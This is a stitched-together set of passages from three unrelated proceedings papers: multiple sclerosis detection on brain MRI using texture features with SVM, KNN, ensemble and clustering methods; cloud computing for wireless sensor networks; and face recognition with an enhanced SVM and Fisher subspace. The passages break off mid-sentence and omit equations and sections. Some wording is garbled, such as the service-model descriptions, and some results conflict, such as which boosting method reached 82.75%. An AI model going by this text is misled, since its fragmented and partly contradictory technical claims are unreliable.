In 2018, a GLCM-based classification of brain MR images using a feed-forward neural network was proposed with 10-fold cross-validation and an accuracy of 92.75% [1]. Classification using AdaBoost with random forests on different datasets, using the two-dimensional discrete wavelet transform for feature extraction and probabilistic principal component analysis (PPCA) for dimensionality reduction, was suggested by [2]. In 2009, the Haar wavelet transform along with PCA was proposed by [3]. A multilayer perceptron along with a modified Jaya algorithm was proposed by [4]. In 2016, KPCA (kernel PCA) with a biorthogonal wavelet along with logistic regression was proposed by [5]. In 2018, a convolutional neural network with a dropout approach was given by [6]. MS patient characterization using a support vector machine with an accuracy of 89.2% was given by Zurita et al. [7].
A threshold-based approach for the segmentation of multiple sclerosis brain magnetic resonance images was given by Valcarcel et al. [8]. An automated technique for the identification and segmentation of MS lesions was given by Roy et al. [9]. A different approach for the identification and segmentation of MS lesions and the classification of healthy from unhealthy brain MR images was given by [10]. The above literature highlights the fact that different machine learning techniques have been utilized successfully for MSD identification on brain MR images. However, in order to compare and analyze the performance of various supervised and unsupervised machine learning techniques for MSD identification, a reinvestigation has been carried out using distinct performance metrics on brain MR images. The key points of this work are:
1. Eighteen textural features are utilized on brain MR images for generating a feature vector, which is fed to KNN, SVM, an ensemble-based classifier, and K-means and Gaussian mixture model (GMM)-based clustering models.
2. The results of the three classifiers and two clustering techniques with different parameters for MSD identification have been tested to find the best accuracy on the e-health dataset [11–15] and a private clinical dataset [16].
3. Observed results are examined and compared with other techniques.
The remainder of the paper is organized as follows. Section 2 gives a thorough explanation of the given approach, and a brief overview of the techniques is addressed. Section 3 gives the experimental results, and Sect. 4 presents the conclusion.
2 Proposed Approach
Firstly, the skull part of the brain magnetic resonance images in both the training and test datasets has been extracted using Adobe Illustrator software. All the images in the training and test datasets have been resized to 64 × 64 using bilinear interpolation. In the next step, all the images have been converted into grayscale. The contrast-limited adaptive histogram equalization method is utilized for improvement of contrast in the training and test dataset images. Afterwards, gamma correction has been used to control the brightness of the images.
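The contrast and brightness steps above can be sketched in plain numpy. This is only an illustration: the authors used CLAHE, which is replaced here by global histogram equalization to stay dependency-free, and the array sizes and gamma value are assumed:

```python
import numpy as np

def to_grayscale(rgb):
    """Luminance-weighted grayscale conversion; values stay in [0, 1]."""
    return rgb @ np.array([0.299, 0.587, 0.114])

def hist_equalize(gray, bins=256):
    """Global histogram equalization (a simple stand-in for CLAHE):
    each pixel is mapped through the cumulative distribution of intensities."""
    hist, edges = np.histogram(gray, bins=bins, range=(0.0, 1.0))
    cdf = hist.cumsum() / hist.sum()
    return np.interp(gray, edges[:-1], cdf)

def gamma_correct(gray, gamma=0.8):
    """Brightness control: out = in ** gamma (gamma < 1 brightens)."""
    return np.clip(gray, 0.0, 1.0) ** gamma

rgb = np.random.rand(64, 64, 3)      # stands in for a resized 64 x 64 slice
gray = to_grayscale(rgb)
enhanced = gamma_correct(hist_equalize(gray))
```

True CLAHE differs in that it equalizes small tiles with a clip limit rather than the whole image, but the pipeline order (grayscale, contrast enhancement, gamma) matches the text.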
Fig. 1 Block diagram of multiple sclerosis identification based on gray level textural feature matrix
(GLTFM) using supervised and unsupervised machine learning techniques
372 S. Jain et al.
2.3 Classification
To classify unhealthy (MS brain MRI) images from healthy (normal brain MRI) images,
five different classification techniques have been used, and their results for MSD
identification are compared in the forthcoming sections.
The minimum distance has been used to calculate the nearest neighbor of a test
brain magnetic resonance image.
SVM (Support Vector Machine). SVM analyzes data to identify patterns and is then
used for classification problems. The classification problem can be restricted to
examination of the two-class problem. For each given input, the
Table 1 Eighteen gray level textural features of brain magnetic resonance image
- Entropy (ENT) = −Σ_{i,j} x(i,j) log(x(i,j)): a statistical measure of variability that
describes the texture of the image
- Energy (ENE) = Σ_{i,j} x(i,j)²: the rate of change in the magnitude of pixel values
over nearby areas
- Homogeneity (HOM) = Σ_{i,j} x(i,j)/(1 + (i − j)²): measures the closeness of the
distribution of matrix elements to the matrix diagonal
- Contrast (CONT) = Σ_{i,j} |i − j|² x(i,j): gives the gray level contrast between a pixel
and its neighboring pixel values over the entire image
- Sum of squares variance (SSV) = Σ_{i,j} (i − μ)² x(i,j): computes the dispersion with
respect to the mean of the gray level distribution
- Maximum probability (MAXPROB) = max x(i,j): gives the most dominant co-occurrence of a
gray level value x_i adjacent to a gray level value x_j in the image
- Autocorrelation (AUTOCORR) = Σ_i Σ_j i·j·x(i,j): a closeness measure between the
dataset and a shifted copy of the dataset
- Dissimilarity (DISS) = Σ_i Σ_j |i − j|·x(i,j): the variation of gray level pairs
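The co-occurrence-based features of Table 1 can be sketched with a small numpy implementation. This is a minimal illustration, not the authors' exact feature pipeline: the quantization level count, the single (0, 1) pixel offset, and the helper names are assumptions.

```python
import numpy as np

def glcm(q, levels, dx=1, dy=0):
    """Normalized gray level co-occurrence matrix x(i, j) for pixel offset (dy, dx).
    q: 2-D array of integer gray levels in [0, levels)."""
    a = q[: q.shape[0] - dy, : q.shape[1] - dx]
    b = q[dy:, dx:]
    m = np.zeros((levels, levels))
    np.add.at(m, (a.ravel(), b.ravel()), 1)  # count co-occurring level pairs
    return m / m.sum()

def texture_features(x):
    """A subset of the Table 1 features computed from a normalized GLCM x."""
    i, j = np.indices(x.shape)
    nz = x[x > 0]  # avoid log(0) in the entropy term
    return {
        "entropy": -np.sum(nz * np.log(nz)),
        "energy": np.sum(x ** 2),
        "homogeneity": np.sum(x / (1 + (i - j) ** 2)),
        "contrast": np.sum(np.abs(i - j) ** 2 * x),
        "dissimilarity": np.sum(np.abs(i - j) * x),
        "max_probability": x.max(),
        "autocorrelation": np.sum(i * j * x),
    }
```

For a constant image, the GLCM puts all mass at one entry, so energy and homogeneity are 1 while entropy, contrast and dissimilarity are 0, which is a quick sanity check of the definitions.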
d_H(M(x_0)) = (w^T M(x_0) + b) / ‖w‖_2    (3)
The product of the predicted and actual labels is greater than zero on a correct predic-
tion and less than zero otherwise. The kernel function takes data as input and transforms
it into the desired form. Three kernel functions (radial basis function, linear and
polynomial) were utilized, and the best accuracy rate of 96.55% was found with the
polynomial kernel function.
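As a sketch of this kernel comparison, the three kernels can be trialled with a generic SVM implementation. This is illustrative only: the synthetic 18-dimensional feature vectors and the 85/15 split stand in for the real texture features and datasets, and scikit-learn's `SVC` is an assumed stand-in for the authors' implementation.

```python
import numpy as np
from sklearn.svm import SVC
from sklearn.model_selection import train_test_split

rng = np.random.default_rng(42)
# Synthetic 18-dimensional "texture" feature vectors for two separable classes
healthy = rng.normal(0.0, 1.0, (60, 18))
unhealthy = rng.normal(1.5, 1.0, (60, 18))
X = np.vstack([healthy, unhealthy])
y = np.array([0] * 60 + [1] * 60)
Xtr, Xte, ytr, yte = train_test_split(X, y, test_size=0.15,
                                      random_state=0, stratify=y)

scores = {}
for kernel in ("rbf", "linear", "poly"):
    clf = SVC(kernel=kernel, gamma="scale")  # "scale" mirrors heuristic kernel-scale selection
    clf.fit(Xtr, ytr)
    scores[kernel] = clf.score(Xte, yte)
print(scores)
```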
Ensemble Learning. Ensemble learning is a technique that combines different
classifiers, each having some error rate, to obtain a resulting approach whose error
rate is small. In this work, decision trees with four different boosting algorithms
(AdaBoostM1, LPBoost, LogitBoost and RUSBoost) and bagging
have been implemented for the binary classification task of separating the healthy
brain class from the unhealthy (multiple sclerosis) brain MR class. In the ensemble, a
large number of trees are built; each tree votes for a class, and the class which
receives the most votes by simple majority is the predicted class. The labels 0 and
1 denote the normal and abnormal classes. The learning
algorithm is then invoked n times, and in every round a training weight is allocated to
each training sample. At the start of the algorithm, the weights of all training
examples are equal; in subsequent rounds, the weights of incorrectly
classified objects are increased so as to focus on difficult objects in the training set.
Lastly, a strong classifier is constructed. The decision tree with LPBoost gives the highest
accuracy rate of 82.75%.
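The boosting/bagging contrast described above can be sketched with scikit-learn. This is an assumed stand-in: `AdaBoostClassifier` (whose default base learner is a decision stump) plays the role of the MATLAB-style AdaBoostM1, and the synthetic data replaces the real feature vectors.

```python
import numpy as np
from sklearn.ensemble import AdaBoostClassifier, BaggingClassifier

rng = np.random.default_rng(7)
# Synthetic stand-in for the 18-feature healthy/unhealthy vectors
X = np.vstack([rng.normal(0.0, 1.0, (80, 18)), rng.normal(2.0, 1.0, (80, 18))])
y = np.array([0] * 80 + [1] * 80)

# Boosting: each round re-weights misclassified samples so later trees focus on them
boost = AdaBoostClassifier(n_estimators=100).fit(X, y)
# Bagging: trees fit on bootstrap resamples, prediction by majority vote
bag = BaggingClassifier(n_estimators=50, random_state=0).fit(X, y)
print(boost.score(X, y), bag.score(X, y))
```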
dist_{ij} = Σ_{i=1}^{p} |m_i − n_i|    (5)

Once all the feature vectors have been assigned to clusters, the first step is
completed and an initial grouping is obtained; the means of the newly formed clusters
are then recomputed. This recursive process continues until the criterion function
reaches its minimum.
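The clustering loop just described (Manhattan-distance assignment per Eq. (5), followed by recomputation of the cluster means) can be sketched as below. The deterministic farthest-point initialization is an illustrative assumption; the paper does not specify its initialization.

```python
import numpy as np

def init_centers(X, k):
    """Deterministic farthest-point initialization (an illustrative choice)."""
    centers = [X[0]]
    for _ in range(k - 1):
        d = np.min([np.abs(X - c).sum(axis=1) for c in centers], axis=0)
        centers.append(X[d.argmax()])
    return np.array(centers)

def kmeans_manhattan(X, k=2, iters=100):
    """K-means with the Manhattan distance of Eq. (5); cluster means are
    recomputed after every assignment pass, as described in the text."""
    centers = init_centers(X, k)
    labels = np.zeros(len(X), dtype=int)
    for _ in range(iters):
        d = np.abs(X[:, None, :] - centers[None, :, :]).sum(axis=2)  # Eq. (5), shape (n, k)
        labels = d.argmin(axis=1)
        new = np.array([X[labels == j].mean(axis=0) if np.any(labels == j)
                        else centers[j] for j in range(k)])
        if np.allclose(new, centers):  # criterion no longer decreasing
            break
        centers = new
    return labels, centers
```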
Gaussian Mixture Model. GMM is also an unsupervised algorithm for classifying
healthy brain MR images from unhealthy ones. It is a probabilistic
model that uses soft clustering to distribute the feature points into
different clusters. For a set of data points, GMM identifies the likelihood that
each data point belongs to each of these distributions. Expectation–maximization
is the basis of GMM. Let μ₁, μ₂ be the means and σ₁, σ₂ the covariances of cluster
1 and cluster 2, respectively, and let ρᵢ be the density of each distribution. These
values are first assigned randomly; then, to find the values of the parameters
defining the Gaussian distributions, expectation–maximization steps are performed.
E Step—For each data point x_i, calculate the probability that it belongs to
cluster/distribution c₁, c₂, using the formula in Eq. (6).
The value is high if the point is assigned to the right cluster; otherwise, it is low.
M Step—μ, σ and ρ are updated using Eqs. (7)–(9) as mentioned below.
ρ_c = (No. of points assigned to the cluster) / (Total number of points)    (7)

The mean and the covariance matrix are updated based on the values assigned to
the distribution, in proportion to the probability values for the data points:

μ_c = Σ_i r_ic x_i / (No. of points assigned to the cluster)    (8)

σ_c = Σ_i r_ic (x_i − μ_c)(x_i − μ_c)^T / (No. of points assigned to the cluster)    (9)
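The E and M steps of Eqs. (7)–(9) can be sketched for a one-dimensional, two-cluster case. This is a minimal sketch under stated assumptions: the min/max initialization of the means is illustrative, and Eq. (6) (the responsibility formula, elided above) is taken to be the usual Bayes-rule posterior over the two Gaussians.

```python
import numpy as np

def gauss(x, mu, var):
    """1-D Gaussian density."""
    return np.exp(-0.5 * (x - mu) ** 2 / var) / np.sqrt(2 * np.pi * var)

def gmm_em(x, iters=100):
    """Two-component 1-D GMM fit by EM, following Eqs. (7)-(9)."""
    mu = np.array([x.min(), x.max()])   # crude initial means (illustrative)
    var = np.array([x.var(), x.var()])
    rho = np.array([0.5, 0.5])
    for _ in range(iters):
        # E step: responsibility r_ic that point x_i belongs to cluster c (Eq. 6)
        lik = np.stack([gauss(x, mu[c], var[c]) for c in range(2)], axis=1)
        r = rho * lik
        r /= r.sum(axis=1, keepdims=True)
        # M step (Eqs. 7-9): effective counts, weights, means, variances
        nc = r.sum(axis=0)                                   # points per cluster
        rho = nc / len(x)                                    # Eq. (7)
        mu = (r * x[:, None]).sum(axis=0) / nc               # Eq. (8)
        var = (r * (x[:, None] - mu) ** 2).sum(axis=0) / nc  # Eq. (9)
    return mu, var, rho
```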
3 Experimental Results
In this section, accuracy is analyzed on different kernel scales and three kernel func-
tions (radial basis function, linear and polynomial). It has been analyzed from Table
4 that the heuristic approach of kernel scale selection gives the best results. The
polynomial kernel gives the highest accuracy (96.55%) as compared to radial basis
function (48.27%) and linear kernel function (93.1%) with a heuristic approach for
identification of the kernel scale as illustrated in Table 4.
Next, accuracy is analyzed over different numbers of learning cycles with the four
boosting methods (AdaBoostM1, LogitBoost, LPBoost and RUSBoost) and the bagging method.
AdaBoost and LogitBoost give the highest accuracy
(82.75%) with 300 and 500 learning cycles, respectively (Table 5).
Table 6 Performance of unsupervised techniques
Classification model | Accuracy (%)
K-mean clustering | 75.86
Gaussian mixture model | 72.41

Fig. 2 Accuracy of K-nearest neighbor on different distance measures
Fig. 4 Accuracy of ensemble on different learning cycles
4 Conclusion
consisting of 110 healthy control brain MRI images from private clinical dataset and
82 unhealthy (multiple sclerosis) brain MRI images from e-health dataset. Eighteen
textural features have been extracted after preprocessing of the brain magnetic
resonance images. It has been verified that the supervised learning approach outperforms
the unsupervised approach. The K-nearest neighbor classifier and the polynomial kernel-
based support vector machine (SVM) give the highest accuracy of 96.55%, compared
to the unsupervised approaches. In future work, different feature extraction techniques
will be analyzed on different classification models, and a comparative study with
convolutional neural networks will also be carried out for the identification of multiple
sclerosis disease from brain magnetic resonance images.
References
1. Zhou, Q., & Shen, X. (2018). Multiple sclerosis identification by grey-level cooccurrence
matrix and biogeography-based optimization. In 2018 IEEE 23rd International Conference on
Digital Signal Processing (DSP), Shanghai, China (pp. 1–5). https://doi.org/10.1109/ICDSP.
2018.8631873
2. Nayak, D. R., Dash, R., & Majhi, B. (2016). Brain MR image classification using two-
dimensional discrete wavelet transform and AdaBoost with random forests. Neurocomputing,
177, 188–197. ISSN 0925-2312, https://doi.org/10.1016/j.neucom.2015.11.034
3. Wu, X., & Lopez, M. (2017). Multiple sclerosis slice identification by haar wavelet transform and
logistic regression. In Advances in Materials, Machinery, Electrical Engineering (AMMEE 2017).
Atlantis Press. https://doi.org/10.2991/ammee-17.2017.10
4. Wang, S.-H., Cheng, H., Phillips, P., & Zhang, Y.-D. (2018). Multiple sclerosis identification
based on fractional fourier entropy and a modified Jaya algorithm. Entropy, 20, 254. https://
doi.org/10.3390/e20040254
5. Wang, S., et al. (2016). Multiple sclerosis detection based on biorthogonal wavelet transform,
RBF kernel principal component analysis, and logistic regression. IEEE Access, 4, 7567–7576.
https://doi.org/10.1109/ACCESS.2016.2620996
6. Zhang, Y. -D., et al. (2018). Multiple sclerosis identification by convolutional neural network
with dropout and parametric ReLU. Journal of Computational Science, 28, 1–10. https://doi.
org/10.1016/j.jocs.2018.07.003
7. Zurita, M., Montalba, C., Labbé, T., Cruz, J. P., da Rocha, J. D., Tejos, C., Ciampi, E.,
Cárcamo, C., Sitaram, R., Uribe, S. (2018). Characterization of relapsing-remitting multiple
sclerosis patients using support vector machine classifications of functional and diffusion MRI
data. NeuroImage: Clinical, 20, 724–730. ISSN 2213-1582, https://doi.org/10.1016/j.nicl.2018.
09.002
8. Valcarcel, A. M. et al. (2020). TAPAS: A thresholding approach for probability map automatic
segmentation in multiple sclerosis. NeuroImage. Clinical 27, 102256. https://doi.org/10.1016/
j.nicl.2020.102256
9. Roy, S., et al. (2017). An effective method for computerized prediction and segmentation of
multiple sclerosis lesions in brain MRI. Computer Methods and Programs in Biomedicine, 140,
307–320. https://doi.org/10.1016/j.cmpb.2017.01.003
10. Shanmuganathan, M., et al. (2020). Review of advanced computational approaches on multiple
sclerosis segmentation and classification. IET Signal Processing, 14(6), 333–341. https://doi.
org/10.1049/iet-spr.2019.0543
11. e-health dataset. http://www.medinfo.cs.ucy.ac.cy/
12. Loizou, C. P., Murray, V., Pattichis, M. S., Seimenis, I., Pantziaris, M., & Pattichis, C. S.
(2011). Multi-scale amplitude modulation-frequency modulation (AM-FM) texture analysis
of multiple sclerosis in brain MRI images. IEEE Transactions on Information Technology in
Biomedicine, 15(1), 119–129.
13. Loizou, C. P., Kyriacou, E. C., Seimenis, I., Pantziaris, M., Petroudi, S., Karaolis, M., &
Pattichis, C. S. (2013). Brain white matter lesion classification in multiple sclerosis subjects
for the prognosis of future disability. Intelligent Decision Technologies Journal (IDT), 7, 3–10.
14. Loizou, C. P., Pantziaris, M., Pattichis, C. S., & Seimenis, I. (2013). Brain MRI image
normalization in texture analysis of multiple sclerosis. Journal of Biomedical Graphics and
Computing, 3(1), 20–34.
15. Loizou, C. P., Petroudi, S., Seimenis, I., Pantziaris, M., & Pattichis, C. S. (2015). Quanti-
tative texture analysis of brain white matter lesions derived from T2-weighted MR images
in MS patients with clinically isolated syndrome. Journal of Neuroradiology. Journal de
Neuroradiologie, 42(2), 99–114. https://doi.org/10.1016/j.neurad.2014.05.006
16. All the healthy brain magnetic resonance images are from the radiology departments of Safdarjang
Hospital, New Delhi and Subharti Medical College, Meerut.
17. Jyotsna, N. R., & Vishwakarma, V. P. (2016). Face recognition using Symlet, PCA and cosine
angle distance measure. In 2016 Ninth International Conference on Contemporary Computing
(IC3), Noida (pp. 1–7). https://doi.org/10.1109/IC3.2016.7880231.
18. Eshaghi, A., Wottschel, V., Cortese, R., Calabrese, M., Sahraian, M. A., Thompson, A. J.,
Alexander, D. C., & Ciccarelli, O. (2016). Gray matter MRI differentiates neuromyelitis optica
from multiple sclerosis using random forest. Neurology, 87(23), 2463–2470. https://doi.org/
10.1212/WNL.0000000000003395
19. Jain, S., Rajpal, N., & Yadav, J. (2020) Multiple sclerosis identification based on ensemble
machine learning technique (November 21, 2020). In Proceedings of the 2nd International
Conference on IoT, Social, Mobile, Analytics and Cloud in Computational Vision and Bio-
Engineering (ISMAC-CVB 2020). Available at SSRN https://ssrn.com/abstract=3734806 or
https://doi.org/10.2139/ssrn.3734806
Cloud Computing Overview of Wireless
Sensor Network (WSN)
Abstract Wireless sensor networks (WSNs) are spatially distributed systems equipped
with an enormous number of nodes for monitoring and recording various environmental
conditions such as humidity, temperature and pressure. In this paper, we begin by
introducing WSNs and cloud computing. Next, we discuss the overview, features and
services provided by cloud computing, followed by an overview of WSNs and application
scenarios that combine cloud computing and WSNs. Finally, we conclude the paper.
1 Introduction
Communication between sensor nodes that use the Internet is often a difficult problem,
yet it makes sense to integrate sensor networks with the Internet [1–12]. At the same
time, the data of a sensor network ought to be accessible at any time and through any
path [1]. Assigning addresses to an enormous number of sensor nodes is perhaps a
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 383
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_31
384 M. P. Nath et al.
challenging problem, so a sensor node cannot establish an association with the network
on its own. Cloud computing also helps a corporate organization conduct its core
business practices with fewer problems and greater
productivity. A cloud-like environment with countless virtual servers and applications
can be managed much more effectively [2].
Figure 1 comprises WSNs (e.g., WSN1, WSN2 and WSN3), clients and the
cloud infrastructure. Clients request services from the framework. A WSN
consists of physical wireless sensor nodes deployed to sense various applications,
such as transport surveillance, weather forecasting, military usage and so on.
Every sensor node is programmed with the required application. A sensor node addition-
ally comprises operating-system components and networking along with management
segments. The application program identifies the application on every sensor node
and sends data back to the cloud gateway via an access point, or hop-by-hop via various
intermediate nodes. The routing protocol plays a fundamental role in managing the
network topology and accommodating network dynamics. The cloud provides on-demand
services and storage resources to the clients. It gives access to these resources through
the web and proves useful when there is an abrupt requirement of resources [3].
Cloud computing is a term used to describe both a platform and a type of
application. Distributed computing platforms with dynamically provisioned and
reconfigured servers are the key factors. Cloud servers
can be virtual machines or physical machines; this is an alternative to having local
servers handle applications. As a consequence, the end clients of a cloud computing
system generally do not know where the servers actually are. Clouds
customarily combine other computing resources, for instance storage
area networks, networking equipment, firewalls and other security devices
[4]. In addition, cloud computing describes applications that are extended to be
accessible over the web. Such cloud applications use large server farms and powerful
servers hosting web applications [5] and data services [6]. Anyone with a
reasonable Internet connection and a standard browser can access cloud applications.
organizations and applications (for instance, SaaS) on the PaaS cloud. The distinction
between SaaS and PaaS is therefore that SaaS hosts only completed
cloud applications, while PaaS provides an advanced platform that hosts completed cloud
applications as well as those in progress. This requires PaaS to provide a basis
for development, including the programming environment, tools and configuration.
Google App Engine is one such example of PaaS [9].
• Infrastructure as a Service (IaaS): Cloud consumers directly use the IT infrastructure
provided in the IaaS cloud (processing, storage, networks and other core computing
resources). In the IaaS cloud, virtualization is used extensively to organize physical
resources dynamically to satisfy rising or falling demands for resources
from cloud consumers. The principal virtualization method is to set up separate virtual
machines (VMs), isolated from both the underlying hardware and other VMs.
This strategy differs from the multi-tenancy model, which
aims to transform the application software architecture so that
multiple instances (from different cloud consumers) can run on a single application.
One example of an IaaS is EC2 from Amazon [9].
• Software as a Service (SaaS): Cloud providers release their applications in a
hosting environment that customers of the application can access by means of
networks from various clients, for example a web browser, a PDA [2],
and so on. Cloud users have no control over the underlying cloud infrastructure, which
often uses a multi-tenant system architecture: different cloud clients' appli-
cations are consolidated in the SaaS cloud in a single logical environment to achieve
economies of scale and efficiency with respect to speed, security, availability,
disaster recovery and maintenance. SaaS examples include Google Mail, Google Docs, etc.
• Data as a Service (DaaS): DaaS can be seen as a special category of IaaS.
DaaS allows consumers to pay for what they actually use rather than for a site
license for the whole database. Besides standard storage interfaces, for instance RDBMS
and file systems, some DaaS implementations offer table-style abstractions that
are designed to scale out to store and retrieve massive amounts of data. Such
kinds of DaaS include "Amazon S3," "Google BigTable," "Apache HBase" [3],
etc.
WSN routing protocols are generally divided into two classes: network-structure-based
and protocol-operation-based. Network-structure-based routing is
further divided into flat-based routing, hierarchical-based routing and
location-based routing. Protocol-operation-based routing is further divided into "multi-
path based," "query based," "QoS based," "coherent based" and "negotiation based"
[3]. In location-based routing, the positions of the sensor nodes are exploited to route infor-
mation in the network. In this kind of routing, sensor nodes are addressed
by means of their locations. The distance between neighboring nodes can
be estimated on the basis of incoming signal strengths.
The relative positions of neighboring nodes can be obtained through the sharing
of this information among neighbors [3]. Alternatively, the location of nodes may be obtained
directly by communicating with a satellite, using "GPS (Global Positioning System)" [5].
Examples of location-based routing protocols are "GAF," "GEAR," "GPSR,"
"MFR," "DIR," "GEDIR," "GOAFR," "SPAN" [5] and so forth. In hierarchical-based
routing, nodes assume different roles in the network. A hierarchical structure
can be utilized to process and send the data, while low-energy nodes can be
utilized to perform the sensing in the proximity of the target. This implies the
creation of clusters and the assignment of special tasks to cluster heads, which can greatly
contribute to overall system scalability, lifetime and energy efficiency.
Joining WSNs with the cloud simplifies the on-the-fly sharing and analysis of
real-time sensor data. It also makes it possible to offer sensor information as a service
over the web. The terms "Software as a Service (SaaS)" [3] and "Sensor
Event as a Service (SEaaS)" [5] are coined to describe how sensor information
and event-of-interest notifications, respectively, can be accessed by customers over the
cloud infrastructure. Merging the two technologies makes sense for a large number of
use cases. Some applications of sensor networks using cloud computing are as follows.
Weather forecasting is the application of predicting the state of the atmosphere for a
future time and a given location. A weather monitoring and forecasting framework
normally incorporates data collection, data assimilation, numerical weather prediction and
forecast presentation. Each weather station is equipped with sensors to detect the
following parameters: wind speed/direction, relative humidity, temperature,
barometric pressure, precipitation, soil moisture, ambient light (visi-
bility) and sky cover. The data gathered from these sensors are tremendous in size
and exceed the capacity of a conventional database. The assimilation process is completed
after collecting the information. The complicated equations that describe how the
atmospheric situation changes over time (the weather forecast) require supercomputers
to solve them [3].
In the military, sensor networks are used for "monitoring friendly forces" [1], "battle-
field surveillance" [3], battle damage assessment, and nuclear, biological and chemical attack
detection, etc. [5]. The information gathered from such applications is of the highest
importance and has high-level security requirements that may not be met
by typical web networks for security reasons. Cloud computing may be
part of the answer to this problem by providing military applications with
a secure platform that is used for defense purposes only.
5 Conclusion
The sharing of information between sensor nodes via the Internet is a difficult chal-
lenge owing to the limited bandwidth, memory and small battery sizes of sensor nodes.
The widely used cloud computing technique can overcome the storage capacity issues.
Some issues pertaining to cloud computing and sensor networking are discussed in
this paper. Specific application-oriented scenarios are important for the devel-
opment of new protocols in sensor networks. Keeping this in mind, some cloud
computing applications of sensor networks have been discussed.
References
1. Wang, Y., Jin, Q., & Ma, J. (2013). Integration of range-based and range-free localiza-
tion algorithms in wireless sensor networks for mobile clouds. In Green Computing and
Communications (GreenCom).
Abstract With the advances in technology, facial recognition has become a very
popular technology, used mainly as a security technique. Face recognition using the
support vector machine has been in use for years, but it does not work well with imbal-
anced data, and its computational time is high. In this work, an enhanced support
vector machine (ESVM) is utilized for multi-classifying face images. The fisher space
method is utilized for feature extraction, as it is more efficient for datasets consisting
of multiple classes, with class separability as a vital attribute while reducing
dimensionality. It concentrates on the types of features in face image data that provide
a better demarcation for separating face images, and then ESVM-based multi-
class classification is utilized for the classification step. The advantages of ESVM-based
multiclass classification for face images include flexibility and improved computational
time. ESVM-based multiclass classification based on One-vs-One (OVO) and One-
vs-All (OVA) is utilized for performing experiments on two standard databases,
Yale and ORL. A number of experiments are also performed varying the sub-
dimensions in fisher space with different kernels of the proposed ESVM on different
training sets of both databases. Remarkable recognition rates of 100% and 92.5% were
achieved on the Yale and ORL databases, respectively.
1 Introduction
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 393
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_32
394 T. Jain and J. Yadav
extensively used in mobile handsets nowadays [2]. This new and reliable technique is
also making headways in other critical industries including defence, banking, home
security, etc. Due to these attributes, researchers are continuously working towards
making this novel technology more robust and fool proof.
In pattern recognition, face recognition is the most widely researched topic.
It involves one-to-many comparisons of a probe face image against all gallery
face images. It consists of three major steps: pre-processing (face
detection, normalization), feature extraction (dimensionality reduction) and feature
matching (authentication/recognition) [3, 4]. The extracted features of the input
image are compared with those stored in the database.
The input for the face recognition system can be a static image or dynamic image
(image captured by video). This work focuses on static images for face recognition.
To achieve this, a combination of the fisher subspace technique and an enhanced
support vector machine is used. Among previously proposed approaches, Turk
and Pentland [5] proposed the concept of Eigenfaces, an unsupervised method.
Belhumeur et al. recommended fisher faces [6], a supervised technique with which
identification performance improved.
Zhang et al. and Maria et al. used the Gabor wavelet transform (GWT), stating that this
method has an improved recognition rate, but its memory requirement, compu-
tation and feature dimensions are very high [7, 8]. For illumination-invariant
face recognition, an approach based on GWT was proposed, with K-nearest
neighbour applied for classification [9]. Jyotsna et al. recommended a different
methodology for face recognition using principal component analysis, symlet and
cosine angle distance to improve the recognition rate on the AT&T database [10].
The key challenges for positive face detection and recognition systems are illumi-
nation conditions, background, occlusion, pose, expressions, etc. Numerous algo-
rithms and approaches have been put forward to address these issues. For pose
invariant facial recognition, Xi Yin et al. suggested a convolutional neural network-
based methodology [11]. For illumination invariant facial recognition, a normaliza-
tion framework using reflectance ratio and homomorphic filtering was proposed [12].
An approach was proposed for expression invariant face recognition that used PCA,
Gabor filter and support vector machine [13], and also the system could identify
various expressions as angry, sad, etc. For feature extraction under various illumina-
tion conditions, an approach using reflectance ratio and histogram equalization was
proposed [14].
In this work, a variant of support vector machine is developed, named as enhanced
support vector machine (ESVM). With an improvement in computational time,
ESVM outperforms the traditional SVM. For classification, both techniques are used,
one-vs-one and one-vs-all. This work contributes in the following manner:
• Fisher subspace method is used for feature extraction and dimensionality reduc-
tion. The main goal of this technique is to maximize inter-class distance and
minimize distance within the class.
An Enhanced Support Vector Machine for Face Recognition … 395
• ESVM is proposed for classification of the input images. This method allows a data
point to lie on the other side of the hyperplane from the group to which it belongs
by adding an error quantity ξ.
• Experimental results are presented on YALE and ORL database, and outstanding
results are achieved, even though no pre-processing technique was applied. Even
better results can be achieved if pre-processing techniques are applied.
This paper is structured as follows: the proposed methodology is
explained in Sect. 2. Section 3 elaborates on experimental results on the Yale and ORL
face image databases to demonstrate the effect of varying sub-dimensions with
a varying number of training sets using the proposed methodology, and a comparison
with existing approaches is shown. The conclusion is presented in Sect. 5.
2 Proposed Methodology
The proposed approach takes the face database as input and then divides it into
training images and test images, as illustrated in Fig. 1. Results are
evaluated by varying sub-dimensions with different kernels on different numbers of
training sets. The fisher subspace method [15] is used for feature extraction, producing
reduced-dimensionality data which is fed into the next stage, namely classification. For
classification, an enhanced support vector machine (ESVM) is developed, and for
multiclass classification two techniques are applied: one-vs-one (OVO) and one-
vs-all (OVA). At the last stage of the proposed methodology, i.e. the model evaluation
stage, recognition accuracy and computational time are calculated for unknown face
images. Using the fisher subspace method, the test images are reduced to the same
dimension as the training images. Then, each reduced image is classified into one of
the class labels.
making the within-class distance smaller after the data sets are projected, and making
the inter-class distance larger. This method does not work by finding principal components;
it finds the type of features, or subspace, that gives more discrimination to
separate the data. The goal of the fisher subspace method is to project an n-dimensional
image onto a smaller subspace s where s ≤ n − 1 [16].
Suppose there are training face images {x_1, x_2, …, x_n} which belong to a total
of C classes, X_1, X_2, …, X_C. The steps to calculate the fisher projections for the
images are as follows [17]:
1. Calculate the within-class scatter matrix (S_w)
S_w measures the degree of scatter among items of the same class. It is calculated as
the summation of the covariance matrices of the individual classes, as given in Eq. (3).
The covariance of each class is shown in Eq. (1):

S_i = Σ_{x_n ∈ C_i} (x_n − μ_i)(x_n − μ_i)^T    (1)

S_w = Σ_{i=1}^{C} S_i    (3)
S_b = Σ_{i=1}^{C} N_i (μ_i − m_t)(μ_i − m_t)^T    (4)

where m_t is the global mean of all k images, m_t = (1/k) Σ_{n=1}^{k} x_n.
Similar to PCA, the eigenvectors having the largest eigenvalues are used to compute
this. The fisher criterion function, with projection vector w, is expressed in Eq. (5):

J(w) = |S_b| / |S_w| = (w^T S_b w) / (w^T S_w w)    (5)
The goal is to maximize J(w), and the optimal fisher basis projection matrix can
be obtained as given in Eq. (6):

